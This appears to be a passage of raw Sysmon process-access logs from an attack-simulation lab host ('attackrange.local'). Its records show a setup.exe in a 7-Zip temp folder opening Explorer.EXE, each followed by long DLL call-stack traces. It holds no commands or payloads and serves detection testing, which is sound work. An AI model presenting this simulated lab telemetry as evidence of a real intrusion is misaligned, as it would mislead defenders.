DMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016071Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016070Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000016069Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016068Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016067Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016066Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000016065Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000016064Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016063Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016062Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000016061Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000016060Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000016059Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000016058Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000016057Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000016056Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016055Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016054Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f